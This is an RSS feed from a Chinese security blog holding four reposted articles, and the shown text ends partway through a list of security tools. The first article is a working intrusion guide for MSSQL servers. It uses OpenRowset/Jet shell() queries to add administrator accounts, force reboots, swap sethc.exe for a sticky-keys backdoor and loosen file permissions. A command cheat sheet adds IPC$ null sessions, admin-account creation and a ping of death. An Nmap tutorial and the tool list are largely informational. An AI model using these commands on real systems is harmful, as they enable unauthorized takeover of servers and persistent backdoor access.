﻿<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>IT博客-金鳞-文章分类-net security</title><link>http://www.cnitblog.com/chenxin9821/category/7353.html</link><description>目标-&gt;软件测试架构师</description><language>zh-cn</language><lastBuildDate>Mon, 26 Sep 2011 19:05:12 GMT</lastBuildDate><pubDate>Mon, 26 Sep 2011 19:05:12 GMT</pubDate><ttl>60</ttl><item><title>1433之黑吃黑杀手锏——沙盒模式(转载)</title><link>http://www.cnitblog.com/chenxin9821/articles/68785.html</link><dc:creator>金鳞</dc:creator><author>金鳞</author><pubDate>Sun, 12 Sep 2010 03:09:00 GMT</pubDate><guid>http://www.cnitblog.com/chenxin9821/articles/68785.html</guid><wfw:comment>http://www.cnitblog.com/chenxin9821/comments/68785.html</wfw:comment><comments>http://www.cnitblog.com/chenxin9821/articles/68785.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/chenxin9821/comments/commentRss/68785.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/chenxin9821/services/trackbacks/68785.html</trackback:ping><description><![CDATA[原创：<a href="http://www.x09.cn/art/1433-zhiheichiheishashoujian-shahemoshi-yuanchuang.html">http://www.x09.cn/art/1433-zhiheichiheishashoujian-shahemoshi-yuanchuang.html</a><br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1433好扫，但是难入侵啊!<br><br>　　不是127错误，就是命令被禁用。 不是缺少哪个DLL文件，就是126错误。<br><br>　　哈，甚至连映像劫持、asshell、jobshell、seshell全部都使用不了，甚至SQL语句读写注册表都不行，该如何办?<br><br>　　或许你忽略了一招你们忘记了沙盒模式的威力。其实很多人也知道沙盒模式，但是没有深究。所以忽视了它。<br><br>　　下面我介绍它：<br><br>　　select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user user pass /add")')<br><br>　　先看这个语句什么意思：意思是用SQL语句执行c:\windows\system32\ias\ias.mdb这个文件，来执行cmd.exe 来添加一个user 的用户。但很多时候cmd被禁用了，所说当你执行这个语句的时候，会显示：无效的调用。<br><br>　　但如果cmd被禁，那接下来该怎么办???<br><br>　　你可以这样去尝试：<br><br>　　select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("net user user pass /add")')<br><br>　　现在没用cmd.exe了 直接利用c:\windows\system32\ias\ias.mdb来调用net 来添加用户。在net.exe没被禁用的情况下，很多的机子是可以添加成功的，接下来<br><br>　　select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators user /add")') 就OK了<br><br>　　如果调用net(或net1)成功 ，但是用user用户登陆不了，那你可以重启系统试试语句可以这样写<br><br>　　select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("shutdown -r -f -t 0")')<br><br>　　重启以后再添加一次用户。<br><br>　　如果c:\windows\system32下的cmd.exe 、net、 net1都被禁用怎么办?<br><br>　　那你可以尝试调用c:\windows\system32\dllcache\下的 net net1<br><br>　　么SQL语句就可以这么写：<br><br>　　select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("dllcache\net user user pass /add")')<br><br>　　select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("dllcache\net localgroup administrators user /add")')<br><br>　　很多情况下，到这里应该执行会成功了，dllcache\下的net net1 一般人不会去禁用。<br><br>　　如果，连dllcache\目录下的net net1都被禁用 用户添加不了 又该怎么办?<br><br>　　&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;<br><br>　　依照是我 ，我会用c:\windows\system32\ias\ias.mdb 来调用system32下的xcopy.exe来执行命令 ，先说说xcopy是干什么用的 xcopy命令可以用来复制替换文件。<br><br>　　因此我们可以调用xcopy命令 来复制替换掉sethc.exe。<br><br>　　所以SQL语句就可以这么写：<br><br>　　select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("xcopy taskmgr.exe sethc.exe /y")')<br><br>　　这句话的意思是： 通过执行c:\windows\system32\ias\ias.mdb来调用xcopy命令xcopy taskmgr.exe sethc.exe /y 是把system32里的任务管理器替换成粘滞键。<br><br>　　依照我的经验，很多机子是可以替换成功的(前提是sethc.exe不被禁)，接下来该怎么做不用我说了3389登陆上去5次shift 则任务管理器就被调出来了任务管理器一调出来 你想做啥都可以了&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;&#183;那要讲的就到这&#183;&#183;&#183;思路是活的 我讲了在很多种情况下的对策，但实际你还可能还会遇到其他的情况，不可能全部的情况我都一一讲解对策，不懂的问我。<br><br>　　那如果 sethc.exe 也被禁止 怎么办?<br><br>　　那思路也很简单，我们可以调用cacls.exe来设置权限，把sethc.exe net.exe 设置成everyone都可以完全控制 就可以了，所以就可以这样来写sql语句：<br><br>　　select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cacls c:\windows\system32\net.exe /e /t /g everyone:F')<br><br>　　这个思路是完全正确的，但是往往执行不成功，是因为我这个SQL连接器不好，还是什么原因反正SQL语句写得太长，命令参数加的太多，就不会执行成功。<br><br>　　我用的是sqltools深度命令集成这个连接器。<br><br>　　还有一点： 哪位兄弟 知不知道 调用system32里的哪个exe，可以执行删除命令(不是del 命令噶)<br><br>　　&#183;&#183;&#183;总算打字完了，，，我没有服务器做实验，所以没有图片 只有文字&#183;&#183;&#183;&#183;&#183;&#183;<br><br>　　我已经做尽力的解释了，但是肯定还有人看不懂。那只能慢慢去读了。<br>
<img src ="http://www.cnitblog.com/chenxin9821/aggbug/68785.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/chenxin9821/" target="_blank">金鳞</a> 2010-09-12 11:09 <a href="http://www.cnitblog.com/chenxin9821/articles/68785.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>net use命令详细解释（转载）</title><link>http://www.cnitblog.com/chenxin9821/articles/68753.html</link><dc:creator>金鳞</dc:creator><author>金鳞</author><pubDate>Thu, 09 Sep 2010 15:22:00 GMT</pubDate><guid>http://www.cnitblog.com/chenxin9821/articles/68753.html</guid><wfw:comment>http://www.cnitblog.com/chenxin9821/comments/68753.html</wfw:comment><comments>http://www.cnitblog.com/chenxin9821/articles/68753.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/chenxin9821/comments/commentRss/68753.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/chenxin9821/services/trackbacks/68753.html</trackback:ping><description><![CDATA[<p>net use ipipc$ " " /user:" " 建立IPC空链接
<p>net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接
<p>net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
<p>net use h: ipc$ 登陆后映射对方C：到本地为H:
<p>net use ipipc$ /del 删除IPC链接
<p>net use h: /del 删除映射对方到本地的为H:的映射
<p>net user 用户名　密码　/add 建立用户
<p>net user guest /active:yes 激活guest用户
<p>net user 查看有哪些用户
<p>net user 帐户名 查看帐户的属性
<p>net localgroup administrators 用户名 /add 把&#8220;用户&#8221;添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
<p>net start 查看开启了哪些服务
<p>net start 服务名　 开启服务；(如:net start telnet， net start schedule)
<p>net stop 服务名 停止某服务
<p>net time 目标ip 查看对方时间
<p>net time 目标ip /set 设置本地计算机时间与&#8220;目标IP&#8221;主机的时间同步,加上参数/yes可取消确认信息
<p>net view 查看本地局域网内开启了哪些共享
<p>net view ip 查看对方局域网内开启了哪些共享
<p>net config 显示系统网络设置
<p>net logoff 断开连接的共享
<p>net pause 服务名 暂停某服务
<p>net send ip "文本信息" 向对方发信息
<p>net ver 局域网内正在使用的网络连接类型和信息
<p>net share 查看本地开启的共享
<p>net share ipc$ 开启ipc$共享
<p>net share ipc$ /del 删除ipc$共享
<p>net share c$ /del 删除C：共享
<p>net user guest 12345 用guest用户登陆后用将密码改为12345
<p>net password 密码 更改系统登陆密码
<p>netstat -a 查看开启了哪些端口,常用netstat -an
<p>netstat -n 查看端口的网络连接情况，常用netstat -an
<p>netstat -v 查看正在进行的工作
<p>netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
<p>netstat -s 查看正在使用的所有协议使用情况
<p>nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
<p>tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：&#8220;-w数字&#8221;用于设置超时间隔。
<p>ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：&#8220;-l[空格]数据包大小&#8221;；&#8220;-n发送数据次数&#8221;；&#8220;-t&#8221;指一直ping。
<p>ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
<p>ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数&#8220;/all&#8221;显示全部配置信息
<p>tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
<p>kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
<p>del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如&#8220;DEL/AR *.*&#8221;表示删除当前目录下所有只读文件，&#8220;DEL/A-S *.*&#8221;表示删除当前目录下除系统文件以外的所有文件 </p>
&nbsp;引自：<a href="http://xk.cn.yahoo.com/articles/070424/1/43w.html">http://xk.cn.yahoo.com/articles/070424/1/43w.html</a> 
<img src ="http://www.cnitblog.com/chenxin9821/aggbug/68753.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/chenxin9821/" target="_blank">金鳞</a> 2010-09-09 23:22 <a href="http://www.cnitblog.com/chenxin9821/articles/68753.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>端口扫描器之王Nmap</title><link>http://www.cnitblog.com/chenxin9821/articles/68470.html</link><dc:creator>金鳞</dc:creator><author>金鳞</author><pubDate>Fri, 27 Aug 2010 11:25:00 GMT</pubDate><guid>http://www.cnitblog.com/chenxin9821/articles/68470.html</guid><wfw:comment>http://www.cnitblog.com/chenxin9821/comments/68470.html</wfw:comment><comments>http://www.cnitblog.com/chenxin9821/articles/68470.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/chenxin9821/comments/commentRss/68470.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/chenxin9821/services/trackbacks/68470.html</trackback:ping><description><![CDATA[<p><strong>目前最强大的扫描工具</strong><br>􀂃包含几乎所有的扫描方式<br>􀂃最好的OS fingerprint技术实现<br>􀂃最新的版本支持协议识别和Banner grabbing<br>􀂃入侵检测规避技术<br>􀂃广泛支持各种操作系统<br>􀂃有很多的图形化前端界面<br>􀂃多种格式的结果输出<br>􀂃<a href="http://www.nmap.org/">www.nmap.org</a><br><strong>Nmap 常用参数命令举例<br></strong>􀂙nmap192.168.9.100<br>􀂙nmap-sV192.168.9.100 (查看开放端口服务信息)<br>􀂙nmap-O 192.168.9.100 (操作系统指纹扫描)<br>􀂙-sS：TCP SYN扫描，半开放扫描<br>􀂙-sT：TCP connect( )扫描，全开放扫描<br>􀂙-sU：UDP 扫描<br>􀂙-v：提高输出信息的详细度<br>􀂙-n ：不进行域名解析<br>􀂙-P0：跳过主机发现阶段,默认所有主机均为存活<br>􀂙-iL：从列表中输入IP<br>􀂙-oN：扫描结果输出<br>􀂙-sP：进行ping扫描(主机发现)，发现存活主机。不<br>进一步的测试(如端口扫描或者操作系统探测)。<br>􀂙-A：全开扫描模式<br>综合实例：nmap-sS-P0 -sV-O -v -n -iLc:\ip.txt-oNc:\scan.txt<br><br><img height=675 alt="" src="http://www.cnitblog.com/images/cnitblog_com/chenxin9821/zenmap.png" width=702 border=0><br><br><br>************************************以上内容转载自CISP培训教程之Mr.Yang<br>************************************以下内容转载自csdn <a href="http://blog.csdn.net/lhfeng/archive/2008/01/14/2042954.aspx">http://blog.csdn.net/lhfeng/archive/2008/01/14/2042954.aspx</a></p>
<p>Nmap是一个跨平台的端口扫描工具,它提供给管理员扫描整个网络的能力,并发现网络的安全弱点所在.</p>
<p>nmap的下载地址是:http://insecure.org/nmap/</p>
<p>Nmap支持的四种最基本的扫描方式：<br>　　1.TCP connect()端口扫描<br>　　2.TCP同步（SYN）端口扫描<br>　　3.UDP端口扫描<br>　　4.Ping扫描</p>
<p>nmap的使用方法:<br>1.直接输入nmap命令, 显示nmap命令的使用语法<br>&nbsp;&nbsp; [root@fc8 ~]# nmap <br>&nbsp;&nbsp; Nmap 4.20 ( <a href="http://insecure.org/">http://insecure.org</a> )<br>&nbsp;&nbsp; Usage: nmap [Scan Type(s)] [Options] {target specification}<br>&nbsp;&nbsp; TARGET SPECIFICATION:<br>&nbsp;&nbsp; Can pass hostnames, IP addresses, networks, etc.<br>&nbsp;&nbsp; Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254<br>&nbsp;&nbsp; -iL &lt;inputfilename&gt;: Input from list of hosts/networks<br>&nbsp;&nbsp; -iR &lt;num hosts&gt;: Choose random targets</p>
<p>2.查看namap的版本<br>&nbsp;&nbsp; [root@fc8 ~]# nmap -V<br>&nbsp;&nbsp; Nmap version 4.20 ( <a href="http://insecure.org/">http://insecure.org</a> )<br>&nbsp;&nbsp; -vv(两个v)查看更详细的输出信息</p>
<p>3.扫描过程中显示常规的扫描信息(需要和其他命令结合使用)<br>&nbsp; [root@fc8 ~]# nmap -v<br>&nbsp; Starting Nmap 4.20 ( <a href="http://insecure.org/">http://insecure.org</a> ) at 2008-01-12 10:55 CST<br>&nbsp; No target machines/networks specified!<br>&nbsp; QUITTING!</p>
<p>&nbsp;4.扫描指定主机名的计算机<br>&nbsp;&nbsp;&nbsp; [root@fc8 ~]# nmap -v -A <a href="http://www.baidu.com/">www.baidu.com</a><br>&nbsp;&nbsp;&nbsp; <br>&nbsp;&nbsp;&nbsp; ..........<br>&nbsp;&nbsp;&nbsp; Host 220.181.6.6 appears to be up ... good.<br>&nbsp;&nbsp;&nbsp; Interesting ports on 220.181.6.6:(百度的ip地址)<br>&nbsp;&nbsp;&nbsp; Not shown: 1693 filtered ports<br>&nbsp;&nbsp;&nbsp; PORT&nbsp;&nbsp;&nbsp; STATE&nbsp; SERVICE VERSION<br>&nbsp;&nbsp;&nbsp; 80/tcp&nbsp;&nbsp;&nbsp; open&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; http&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Apache httpd 1.3.27(原来我们使用的百度搜索服务是apache1.3提供的界面)<br>&nbsp;&nbsp; 179/tcp&nbsp;&nbsp; closed&nbsp;&nbsp; bgp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (没有开动态路由协议)<br>&nbsp;&nbsp; 639/tcp&nbsp;&nbsp; closed&nbsp;&nbsp; unknown<br>&nbsp;&nbsp; 646/tcp&nbsp;&nbsp; closed&nbsp;&nbsp; unknown<br>&nbsp;&nbsp;&nbsp; Running: OpenBSD 3.X&nbsp;&nbsp;&nbsp;&nbsp; (看看百度用的操作系统是openbsd 3.6呀)<br>&nbsp;&nbsp; OS details: OpenBSD 3.6 x86 with pf "scrub in all"<br>&nbsp;&nbsp; TCP Sequence Prediction: Difficulty=0 (Trivial joke)<br>&nbsp;&nbsp; IPID Sequence Generation: All zeros<br>&nbsp;&nbsp;&nbsp; ............<br>&nbsp; 5.扫描指定网段上都有哪些主机存在<br>&nbsp;&nbsp; -sP:使用ping的方式探测主机,如果对方关闭了icmp你就探测不到了.<br>&nbsp;&nbsp; [root@fc8 ~]# nmap -v -sP 192.168.1.0/24<br>&nbsp;&nbsp; Initiating SYN Stealth Scan at 11:04 (使用半连接方式机型探测)<br>&nbsp;&nbsp;&nbsp;&nbsp; .............<br>&nbsp;&nbsp;&nbsp; Host 192.168.1.1 appears to be up.&nbsp; (192.168.1.1在网络上 )<br>&nbsp;&nbsp;&nbsp; MAC Address: 00:17:9A:CF:A1:0D (D-Link)&nbsp; (mac地址看到了,网卡是d-link品牌的)<br>&nbsp;&nbsp;&nbsp; Host 192.168.1.40 appears to be up.<br>&nbsp;&nbsp;&nbsp; MAC Address: 00:E0:4D:90:46:37 (Internet Initiative Japan)<br>&nbsp;&nbsp;&nbsp; Host 192.168.1.145 appears to be up.<br>&nbsp;&nbsp;&nbsp; MAC Address: 00:0A:EB:9A:38:24 (Shenzhen Tp-Link Technology Co;)<br>&nbsp;&nbsp;&nbsp; Host 192.168.1.147 appears to be up.<br>&nbsp;&nbsp;&nbsp; MAC Address: 00:15:58:A9:88:9B (Foxconn)<br>&nbsp;&nbsp;&nbsp; Host 192.168.1.151 appears to be up.<br>&nbsp;&nbsp;&nbsp; MAC Address: 00:1B:24:06:48:AF (Unknown)&nbsp;&nbsp;&nbsp; (这个网卡类型没有被侦测出来)<br>&nbsp;&nbsp; .......<br>&nbsp;<br>&nbsp;&nbsp; 6.防止被扫描者探测到你的扫描(须熟悉tcp的三次握手四次断开的过程)<br>&nbsp;&nbsp;&nbsp; [root@fc8 ~]# nmap -sS 192.168.1.1<br>&nbsp;&nbsp;&nbsp; Starting Nmap 4.20 ( <a href="http://insecure.org/">http://insecure.org</a> ) at 2008-01-12 11:58 CST<br>&nbsp;&nbsp;&nbsp; Interesting ports on 192.168.1.1:<br>&nbsp;&nbsp;&nbsp; Not shown: 1696 filtered ports<br>&nbsp;&nbsp;&nbsp; PORT&nbsp;&nbsp;&nbsp;&nbsp; STATE SERVICE<br>&nbsp;&nbsp;&nbsp; 1080/tcp open&nbsp; socks (对方开了1080端口哦)<br>&nbsp;&nbsp;&nbsp; MAC Address: 00:17:9A:CF:A1:0D (D-Link)</p>
<p>&nbsp;</p>
<p><a href="http://blog.csdn.net/lhfeng/archive/2008/01/14/2042954.aspx"></a>&nbsp;</p>
<img src ="http://www.cnitblog.com/chenxin9821/aggbug/68470.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/chenxin9821/" target="_blank">金鳞</a> 2010-08-27 19:25 <a href="http://www.cnitblog.com/chenxin9821/articles/68470.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>网络安全领域最具代表性的75个安全工具(转)</title><link>http://www.cnitblog.com/chenxin9821/articles/62165.html</link><dc:creator>金鳞</dc:creator><author>金鳞</author><pubDate>Tue, 27 Oct 2009 14:01:00 GMT</pubDate><guid>http://www.cnitblog.com/chenxin9821/articles/62165.html</guid><wfw:comment>http://www.cnitblog.com/chenxin9821/comments/62165.html</wfw:comment><comments>http://www.cnitblog.com/chenxin9821/articles/62165.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/chenxin9821/comments/commentRss/62165.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/chenxin9821/services/trackbacks/62165.html</trackback:ping><description><![CDATA[网友评选出来的75个最佳安全工具在网络安全领域都是一些很有代表性的软件，对于那些在网络安全方面不知从何处开始的新手们来说，有相当的参考价值。
<p>　　<strong>工具:</strong>Nessus(最好的开放源代码风险评估工具)</p>
<p>　　网址:http://www.nessus.org/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix</p>
<p>　　简介:Nessus是一款可以运行在Linux、BSD、Solaris以及其他一些系统上的远程安全扫描软件。它是多线程、基于插入式的软件，拥有很好的GTK界面，能够完成超过1200项的远程安全检查，具有强大的报告输出能力，可以产生HTML、XML、LaTeX和ASCII文本等格式的安全报告，并且会为每一个发现的安全问题提出解决建议。</p>
<p>　　<strong>工具:</strong>Ethereal(网络协议检测工具)</p>
<p>　　网址:http://www.ethereal.com/</p>
类别:开放源码
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:Ethereal是一款免费的网络协议分析程序，支持Unix、Windows。借助这个程序，你既可以直接从网络上抓取数据进行分析，也可以对由其他嗅探器抓取后保存在硬盘上的数据进行分析。你能交互式地浏览抓取到的数据包，查看每一个数据包的摘要和详细信息。Ethereal有多种强大的特征，如支持几乎所有的协议、丰富的过滤语言、易于查看TCP会话经重构后的数据流等。</p>
<p>　　<strong>工具:</strong>Snort(免费的入侵检测系统)</p>
<p>　　网址:http://www.snort.org/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:Snort是一款轻量级的网络入侵检测系统，能够在IP网络上进行实时的流量分析和数据包记录。它不仅能进行协议分析、内容检索、内容匹配，而且能用于侦测诸如缓冲溢出、隐秘端口扫描、CGI攻击、SMB探测、操作系统指纹识别等大量的攻击或非法探测。Snort使用灵活的规则去描述哪些流量应该被收集或被忽略，并且提供一个模块化的探测引擎。</p>
<p>　　<strong>工具:</strong>Netcat(网络瑞士军刀)</p>
<p>　　网址:http://www.atstake.com/research/tools/network_utilities/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:一个简单而有用的工具，透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具，能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几乎所有类型的网络连接，还有几个很有意思的内置功能。</p>
　　<strong>工具:</strong>TCPDump/WinDump(用于网络监测和数据收集的优秀嗅探器)
<p>&nbsp;</p>
<p>　　网址:http://www.tcpdump.org/，http://windump.polito.it/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:Tcpdump是一款众人皆知和受人喜欢的基于命令行的网络数据包分析和嗅探工具。它能把匹配规则的数据包的包头给显示出来。你能使用这个工具去查找网络问题或者去监视网络上的状况。WinDump是Tcpdump在Windows平台上的移植版。</p>
<p>　　<strong>工具:</strong>Hping2(类似ping的网络探测工具)</p>
<p>　　网址:http://www.hping.org/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix</p>
<p>　　简介:hping2能发送自定义的ICMP/UDP/TCP包到目标地址并且显示包的响应情况。它有一个方便的traceroute模式，并且支持IP分片。这个工具在traceroute、ping和探测_blank"&gt;防火墙后的主机时特别有用。</p>
<p>　　<strong>工具:</strong>DSniff(一流的网络审计和渗透测试工具)</p>
<p>　　网址:http://naughty.monkey.org/~dugsong/dsniff/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:DSniff是由Dug Song开发的一套包含多个工具的软件套件。其中，dsniff、filesnarf、mailsnarf、msgsnarf、rlsnarf和 webspy可以用于监视网络上我们感兴趣的数据(如口令、e-mail、文件等)，arpspoof、dnsspoof和macof能很容易地载取到攻击者通常难以获取的网络信息(如二层交换数据)，sshmitm和webmitm则能用于实现重写SSH和HTTPS会话达到monkey-in-the -middle攻击。在http://www.datanerds.net/~mike/dsniff.html可以找到Windows平台上的移植版。</p>
<p>　　<strong>工具:</strong>GFI LANguard(商业化的网络安全扫描软件)</p>
<p>　　网址:http://www.gfi.com/lannetscan/</p>
<p>　　类别:商业</p>
<p>　　平台:Windows</p>
<p>　　简介:LANguard扫描网络并且得出诸如每台机器的服务包等级、缺少的安全补盯打开的共享、开放的端口、正在运行的服务和应用程序、注册表键值、弱口令、用户和组等扫描信息的报告。扫描结果输出为一个HTML格式的报告，报告能够自定义。</p>
<p>　　<strong>工具:</strong>Ettercap(为你的交换环境提供更多的安全)</p>
<p>　　网址:http://ettercap.sourceforge.net/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:Ettercap是一款以太网环境下的网络监视、拦载和记录工具，支持多种主动或被动的协议分析(甚至跟加密相关的SSH、HTTPS等)，有数据插入、过滤、保持连接同步等多种功能，也有一个能支持多种嗅探模式的、强大而完整的嗅探套件，支持插件，能够检查网络环境是否是交换局域网，并且能使用主动或被动的操作系统指纹识别技术让你了解当前局域网的情况。</p>
<p>　　<strong>工具:</strong>Whisker/Libwhisker(CGI缺陷扫描软件和库)</p>
<p>　　网址:http://www.wiretrip.net/rfp/p/doc.asp/d21.htm</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:Whisker是一款非常好的HTTP服务器缺陷扫描软件，能扫描出大量的已知安全漏洞，特别是些危险的CGI漏洞。Libwhisker是一个用perl编写的由Whiskerr使用的程序库，通过它你可以创建自己HTTP扫描器。</p>
<p>　　<strong>工具:</strong>John the Ripper(格外强大、灵活、快速的多平台哈希口令破解器)</p>
<p>　　网址:http://www.openwall.com/john/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:John the Ripper是一个快速的口令破解器，支持多种操作系统，如Unix、DOS、Win32、BeOS和OpenVMS等。它设计的主要目的是用于检查 Unix系统的弱口令，支持几乎所有Unix平台上经crypt函数加密后的口令哈希类型，也支持Kerberos AFS和Windows NT/2000/XP LM哈希等。</p>
<strong>工具:</strong>OpenSSH/SSH(访问远程计算机的一种安全方法)
<p>&nbsp;</p>
<p>　　网址:http://www.openssh.com/，http://www.ssh.com/commerce/index.html</p>
<p>　　类别:开放源码/商业</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:SSH(Secure Shell)是一款用来登录远程服务器并在远程服务器上执行命令的程序，在缺少安全防护的网络上它能给两台互不信任的主机间提供安全可靠的加密通讯。X11连接和其他任意的TCP/IP端口连接都可以通过SSH进行数据封装转发到一个安全的通道里。SSH开发的本意是用于代替rlogin、rsh和rcp这些不安全的程序，以及为rdist和rsync提供安全通道。需要注意的是，OpenSSH是SSH的替代软件，SSH对于某些用途是要收费的，但OpenSSH总是免费。</p>
<p>　　<strong>工具:</strong>Sam Spade(Windows平台上的免费网络查询工具)</p>
<p>　　网址:http://www.samspade.org/ssw/</p>
<p>　　类别:免费软件</p>
<p>　　平台:Windows</p>
<p>　　简介:SamSpade提供了一个友好的GUI界面，能方便地完成多种网络查询任务，它开发的本意是用于追查垃圾邮件制造者，但也能用于其它大量的网络探测、网络管理和与安全有关的任务，包括ping、nslookup、whois、dig、traceroute、finger、raw HTTP web browser、DNS zone transfer、SMTP relay check、website search等工具，在它的网站还有大多数查询工具的一个在线版本(http://www.samspade.org/t/)。</p>
<p>　　<strong>工具:</strong>ISS Internet Scanner(应用层风险评估工具)</p>
<p>　　网址:http://www.iss.net/products_services/enterprise_protection/</p>
<p>　　vulnerability_assessment/scanner_internet.php</p>
<p>　　类别:商业</p>
<p>　　平台:Windows</p>
<p>　　简介:互联网扫描器(Internet Scanner)始于1992年一个小小的开放源代码扫描器，它是相当不错的，但价格昂贵，使用开源软件Nessus来代替它也是一个不错的选择。</p>
<p>　　<strong>工具:</strong>Tripwire(功能强大的数据完整性检查工具)</p>
<p>　　网址:http://www.tripwire.com/</p>
<p>　　类别:商业</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:Tripwire是一款文件和目录完整性检查工具，它能帮助系统管理员和用户监视一些重要文件和目录发生的任何变化。通过制定一些基本的系统策略，在文件遭到破坏或篡改时由Tripwire通知系统管理员，从而能及时地做出处理。Tripwire的商业版本非常昂贵，在Tripwire.Org网站有一个免费的开放源代码的Linux版本，UNIX用户也可能需要考虑AIDE(http://www.cs.tut.fi/~rammer/aide.html)，它是Tripwire的免费替代品。</p>
<p>　　<strong>工具:</strong>Nikto(一款非常全面的web扫描器)</p>
<p>　　网址:http://www.cirt.net/code/nikto.shtml</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:Nikto是一款能对web服务器多种安全项目进行测试的扫描软件，能在200多种服务器上扫描出2000多种有潜在危险的文件、CGI及其他问题。它也使用LibWhiske库，但通常比Whisker更新的更为频繁。</p>
<p>　　<strong>工具:</strong>Kismet(强大的无线嗅探器)</p>
<p>　　网址:http://www.kismetwireless.net/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:Kismet是一款802.11b网络嗅探和分析程序，功能有:支持大多数无线网卡，能通过UDP、ARP、DHCP数据包自动实现网络IP阻塞检测，能通过Cisco Discovery协议列出Cisco设备，弱加密数据包记录，和Ethereal、tcpdump兼容的数据包dump文件，绘制探测到的网络图和估计网络范围。</p>
<p>　　<strong>工具:</strong>SuperScan(Windows平台上的TCP端口扫描器)</p>
<p>　　网址:http://www.foundstone.com/index.htm?subnav=resources/</p>
<p>　　avigation.htm&amp;subcontent=/resources/proddesc/superscan.htm</p>
<p>　　类别:免费</p>
<p>　　平台:Windows</p>
<p>　　简介:SuperScan是一款具有TCP connect端口扫描、Ping和域名解析等功能的工具，能较容易地做到对指定范围内的IP地址进行ping和端口扫描。源代码不公开。</p>
